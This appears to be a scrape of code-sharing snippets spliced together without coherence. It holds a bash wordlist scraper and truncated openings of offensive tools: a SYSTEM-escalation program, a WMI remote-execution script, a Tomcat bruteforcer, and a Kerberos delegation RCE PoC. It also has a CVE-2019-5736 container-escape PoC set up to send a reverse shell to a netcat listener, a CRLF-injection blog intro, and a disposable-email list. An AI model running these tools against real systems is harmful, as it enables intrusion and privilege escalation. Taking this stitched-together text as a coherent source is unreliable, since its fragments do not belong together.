- Acquisitions https://acquiredby.co/apple-acquisitions/
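# with user-agent
# credits @fo0_
#
# wordgrab HOST[/PATH]
#   Fetches https://HOST[/PATH], renders the page to text with html2text and
#   prints a sorted, case-folded, de-duplicated word list on stdout. Hyphenated
#   words are emitted as-is, with '-' replaced by '.', and split into parts.
#   Returns 2 when no argument is given and 1 when no temp file can be created.
wordgrab() {
    local url tmpfile
    url=$1
    if [ -z "$url" ]; then
        echo "usage: wordgrab <host[/path]>" >&2
        return 2
    fi

    # mktemp gives an unpredictable, exclusively created 0600 file. The previous
    # name was the epoch second in the current directory, which is guessable and
    # collides when two runs start within the same second.
    tmpfile="$(mktemp "${TMPDIR:-/tmp}/wordgrab.XXXXXX")" || return 1

    # NOTE(review): -k turns off TLS certificate verification, so the fetched
    # page is not authenticated. Treat the resulting words as untrusted input,
    # and drop -k when the host presents a valid certificate.
    curl -sLk -m 3 \
        -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" \
        "https://$url" \
        | html2text \
        | grep -Eio '[0-9a-zA-Z\-]+' \
        | tr '[:upper:]' '[:lower:]' \
        | sed -r 's/^[^a-z]+//g' \
        | sed -r 's/[^a-z0-9]+$//g' \
        | sort -fu \
        | tee -a "$tmpfile" \
        | tr '-' '.' \
        | tee -a "$tmpfile" \
        | tr '.' '\n' >> "$tmpfile"

    # All three variants were appended to the same file; de-duplicate once more.
    sort -fu -- "$tmpfile"
    rm -f -- "$tmpfile"
}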
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
namespace GetSystem | |
{ | |
class Program | |
{ |
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like HackerOne, or you're a programmer who wants to write secure PHP, this might be useful to you.
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
0-00.usa.cc | |
0-mail.com | |
001.igg.biz | |
0039.cf | |
0039.ga | |
0039.gq | |
0039.ml | |
027168.com | |
0317123.cn | |
0815.ru |
""" | |
Tomcat bruteforce | |
Author: @itsecurityco | |
""" | |
import os | |
import sys | |
import getopt | |
import base64 | |
import requests |
<?php | |
$infile = 'austria.csv'; | |
$outfile = 'austria.ips'; | |
$fp = fopen($outfile,'w'); | |
$handle = fopen($infile, "r"); | |
if ($handle) | |
{ | |
while (($line = fgets($handle)) !== false) { | |
$line = trim($line); |
#!/bin/python3 | |
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
# Target will need a python3 interpreter | |
# Edit IP info below, on the host run a netcat to catch the reverse shell | |
# Run this python file in the container | |
# Then from the host: docker exec -i <container name> /tmp/evil | |
import os | |
import stat | |
host='172.17.0.1' |
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a rough PoC | |
# requirements for RCE: | |
# - the attacker needs to either have or create an object with a service principal name | |
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
# - NTLM has to be in use |